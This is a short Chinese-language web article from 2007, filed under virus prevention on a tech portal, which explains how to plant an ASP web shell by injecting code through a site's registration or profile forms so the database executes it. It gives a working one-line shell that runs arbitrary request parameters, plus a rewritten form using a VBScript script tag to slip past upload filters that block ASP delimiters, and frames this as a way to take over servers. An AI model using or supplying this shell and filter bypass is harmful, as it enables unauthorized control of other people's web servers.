设为首页  
联系我们  
加入收藏  
网页制作 冲浪宝典 图形图像 操作系统 软件教学 编程开发 认证考试 安全技术 站长专区 文学驿站 娱乐天地 游戏天地 办公软件
文章搜索
您的位置: 首页 >> 文章首页 >> 安全技术 >> 病毒防治 >> 插入ASP代码让网站数据库成为ASP木马
精品推荐
病毒防治点击TOP10
·小心三类危险的TXT文本文件
·解析U盘病毒Autorun文件和RavMonE.exe病毒
·ARP病毒反复发作 专家支招如何彻底防范
·局域网ARP病毒快速诊断及解决方案
·局域网受到ARP欺骗攻击时的解决方法介绍
·黑客教你如何利用Excel剿灭DLL木马
·毒王AV终结者再生新变种 网游大盗窃取信息
·电脑新手该如何处理ARP伪装攻击包的问题
·防病毒必务宝典—计算机病毒专杀进程列表
·经典winlogon病毒查杀方法
安全技术点击TOP10
·计算机启动过程详解
·教你如何手动查杀“幽灵(I-Worm.Ghost)”病毒
·主板芯片级维修技术资料
·贴片元件标记对应型号资料
·20种死机案例实录
·主板开机原理
·在WindowsXP/2003下查看端口对应的进程
·主板点不亮(不显示)的BIOS修复两法
·阻止通电自动开机
·Symantec AntiVirus防病毒服务器安装配置使用指南
精选专题

插入ASP代码让网站数据库成为ASP木马

作者: 来源:http://www.xgdown.com/ 时间:2007-8-28 11:16:40

很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。

不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。

这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是:

〈%execute request("l")%〉

我们可以把它的标签换下来。

然后改成:

<scriptlanguage=VBScript runat=server>execute request("l")</Script>

这样就避开了使用〈%%〉,保存为.ASP,程序同样执行。


插入ASP代码让网站数据库成为ASP木马 相关文章:
插入ASP代码让网站数据库成为ASP木马 相关软件:
特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
转载请注明来源:http://www.xgdown.com